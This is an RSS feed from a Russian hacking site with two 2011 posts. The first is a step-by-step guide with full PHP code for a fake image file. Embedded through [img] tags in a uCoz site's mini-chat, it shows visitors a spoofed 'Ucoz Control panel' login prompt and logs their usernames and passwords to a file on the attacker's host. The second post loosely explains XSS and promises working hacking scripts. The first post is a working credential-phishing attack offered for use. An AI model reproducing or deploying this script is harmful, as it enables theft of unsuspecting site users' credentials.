<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>Скрипты для взлома - Для взлома .ру , программы для взлома , взлом, взломать, пароль, Вконтакте, Одноклассники , Facebook ,  почты, онлайн игр , Lineage, Wow, платных архивов</title>
<link>http://dlya-vzloma.ru/</link>
<language>ru</language>
<description>Скрипты для взлома - Для взлома .ру , программы для взлома , взлом, взломать, пароль, Вконтакте, Одноклассники , Facebook ,  почты, онлайн игр , Lineage, Wow, платных архивов</description>
<generator>DataLife Engine</generator><item>
<title>Скрипт для взлома сайта на Ucoz</title>
<guid isPermaLink="true">http://dlya-vzloma.ru/scripti/15-skript-dlya-vzloma-sayta-na-ucoz.html</guid>
<link>http://dlya-vzloma.ru/scripti/15-skript-dlya-vzloma-sayta-na-ucoz.html</link>
<description><![CDATA[<p>Привет! Сегодня я вам расскажу об одном из способов взлома сайта на UCOZ&rsquo;е. Каждый настоящий хакер может обнаружить достаточное количество уязвимостей на подобных сайтах и знает множество способов для взлома этих сайтов. Я надеюсь, что и я скоро стану таким =).<br /> <br /> Итак, приступим...<br /> В начале нужно зарегить host обязательно с поддержкой php (что-то вроде http://mywebsite.phphost.net). После завершения регистрации загружаем на ftp скрипт, а затем ставим права на файл goodsmile.gif и на .txt файл, например: pass.txt (сюда должны присылаться пароли пользователей взломанного сайта). Затем&nbsp;скачайте любой смайлик с расширением .gif (типа good.gif).&nbsp;<br /> Затем откройте редактор Notepad и набираете следующее:<br /> <br /> <!--dle_spoiler код скрипта --><div class="title_spoiler"><img id="image-spe183c94812db5408372a36594ddd47da" style="vertical-align: middle;border: none;" alt="" src="{THEME}/dleimages/spoiler-plus.gif" />&nbsp;<a href="javascript:ShowOrHide('spe183c94812db5408372a36594ddd47da')"><!--spoiler_title-->код скрипта<!--spoiler_title_end--></a></div><div id="spe183c94812db5408372a36594ddd47da" class="text_spoiler" style="display:none;"><!--spoiler_text-->&lt;?<br /> header("Content-type: image/gif");<br /> $image = imagecreatefromgif(' goodsmile.gif');<br /> if(!$_COOKIE['LOGON'])<br /> {<br /> &nbsp;$login = $_SERVER['PHP_AUTH_USER'];<br /> &nbsp;$pass = $_SERVER['PHP_AUTH_PW'];<br /> if(strlen($pass) &lt;= 4 || !$login)<br /> &nbsp;{<br /> &nbsp; Header('HTTP/1.1 401 Unauthorized');<br /> &nbsp; Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');<br /> &nbsp;}<br /> &nbsp;elseif($login)<br /> &nbsp;{<br /> setcookie('LOGON',md5($pass));<br /> $f = fopen('pass.txt', 'ab');<br /> fwrite($f, $login." ||| ".$pass."\r\n");<br /> fclose($f);<br /> &nbsp;}<br /> }<br /> imagegif($image);<br /> imagedestroy($image);<br /> ?&gt;<br /><!--spoiler_text_end--></div><!--/dle_spoiler--> <br /> <br /> Как только вы всё напишите, сохраните файл под именем goodsmile, потом замените расширение на .gif.<br />&nbsp;Затем выберите любой UCOZ&rsquo;овский сайт, например http://other.ucoz.ru/ как обычно, у них есть мини-чат, как правило с правой стороны. Далее - для начала регистрируетесь на сайте, затем в мини-чате вводите логин, а в сообщении напишите следующее:<br />&nbsp;<!--code1--><div class="scriptcode"><!--ecode1--> <span style="color: #000000;">[</span>img<span style="color: #000000;">]</span> http://mywebsite.phphost.net/%20goodsmile.gif <span style="color: #000000;">[</span>/img<span style="color: #000000;">]</span><!--code2--></div><!--ecode2--></p>
<p>Нажимаем ОК</p>
<p>. Если после этих манипуляций в мини-чате, вместо введенного сообщения появился смайлик - радуйтесь, потому что сайт - уязвимый. После этих манипуляций, у всех кто будет посещать данную страницу, (в моем примере это http:// other.ucoz.ru/) будет выплывать форма, в которой необходимо будет прописать свои логин и пароль. И у вас, при входе на данный сайт, эта форма также будет появляться. А все, введенные в эту форму логины и пароли будут отправляться в файл pass.txt, который вы создавали в самом начале и заливали на ftp.<br /> <br /> На некоторых сайтах описанная уязвимость может не пройти. Но стандартно созданный UCOZ&rsquo;овский сайт, без дополнительных настроек уязвим. Всем большое спасибо за просмотр, надеюсь эта статья вам помогла =)</p>]]></description>
<category><![CDATA[Скрипты для взлома]]></category>
<dc:creator>Admin</dc:creator>
<pubDate>Sun, 10 Apr 2011 19:05:22 +0300</pubDate>
</item><item>
<title>Скрипт для взлома как им пользоваться?</title>
<guid isPermaLink="true">http://dlya-vzloma.ru/scripti/8-skript-dlya-vzloma-kak-im-polzovatsya.html</guid>
<link>http://dlya-vzloma.ru/scripti/8-skript-dlya-vzloma-kak-im-polzovatsya.html</link>
<description><![CDATA[<p>Скрипы для взлома что же это такое? Рассмотрим  XSS скрипты<br /><img style="float: right; margin: 4px; border: 0px none currentColor;" title="скрипт" src="http://dlya-vzloma.ru/uploads/posts/2011-03/1300833249_sets_user2.jpg" alt="скрипт" width="300" /><br /><br /> XSS (Сross Site Sсriрt &mdash; &laquo;кроссайтовый скрипт&raquo;) &mdash; очень популярный вид уязвимости интернет сайтов . XSS появляеться, тогда когда в создаваемые на сервере , то есть на сайте, страницы внедряют , свой хакерский скрипт. Особенностью данных скриптов является то , что вместо прямого взлома сайта, хакеры используют уязвимый (то есть дырявый) сервер в как способ атаки на пользователя сайта а не на сам сайт.<br /><br />На сегодня XSS это чуть больше 15 % всех найденных способов взлома. Довольно таки долго создатели сайтов вообще не знали о таких скриптах и не уделяли им внимания , так как самому сайту они вред не наносили. Но скоро всё поменялось: на самом сайте или в HTTP-Cookie можно найти очень важные данные такие как зашифрованный пароль пользователя, или вообще ID сессии админа). На популярном сайте который используется миллионам такой скрипт вполне способен устроить DoS-атакy.<br /><br />Как поместить скрипт на сайт чтобы его взломать?<br /><br />Есть сайты которые разрешают юзеру использовать HTML-код для отображения сообщения. В случае когда отсутствует нужный уровень защиты, хакер вполне сможет вставлять такие теги как &lt;script&gt;, которые будут отправлять хакеру пароли и личные данные пользователя, который зайдет на данную страницу с кодом, или вообще запускать на его компьютере программы и скрипты хакера.<br /><br />Примером может послужить популярный сервис видео хранения Youtube , который взломали спомошью такой уязвимости.<br /><br />Google довольно быстренько отрегировал на взлом, точнее на то что один из их программистов серьезно налажал , разрешив пользователям использовать серьезнейшую уязвимость с вызовом j&#097;vascript(а) на их сайте. Комментарии  тут же закрыли и за 2 часа программисты быстренько латали ошибки неудачника и закрывали уязвимость. Кстати такие ошибки не редкость так как никто не идеален, а апреле 2010 года  хакеры взломали еще один проект Google &ndash; Gmail то есть их же почту, ну тогда шуму было по больше.<br /><br />Где скачать скрипт для взлома?<br /><br />Вскоре мы опублиуем для вас примеры самых удачных скриптов для взлома сайтов , которые были написаны за всю историю рунета, и обуликуем парочку свеженьких и рабочих скриптов для взлома.<br /><br /></p>]]></description>
<category><![CDATA[Скрипты для взлома]]></category>
<dc:creator>Admin</dc:creator>
<pubDate>Tue, 22 Mar 2011 23:07:53 +0200</pubDate>
</item></channel></rss>